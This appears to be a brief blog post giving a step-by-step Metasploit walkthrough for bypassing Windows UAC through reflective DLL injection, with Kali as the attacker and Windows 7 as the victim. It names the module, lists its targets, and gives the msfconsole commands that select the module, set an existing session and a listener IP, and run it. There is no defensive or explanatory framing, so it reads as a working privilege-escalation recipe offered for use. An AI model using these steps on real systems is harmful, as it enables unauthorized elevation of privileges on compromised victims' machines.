This
module will bypass Windows UAC by utilizing the trusted publisher
certificate through process injection. It will spawn a second shell that
has the UAC flag turned off. This module uses the Reflective DLL
Injection technique to drop only the DLL payload binary instead of three
seperate binaries in the standard technique. However, it requires the
correct architecture to be selected, (use x64 for SYSWOW64 systems also)
Exploit Targets
Windows 32 bit
Windows 64 bit
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1
msf exploit (bypassuac_injection)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (bypassuac_injection)>exploit
0 comments :
Post a Comment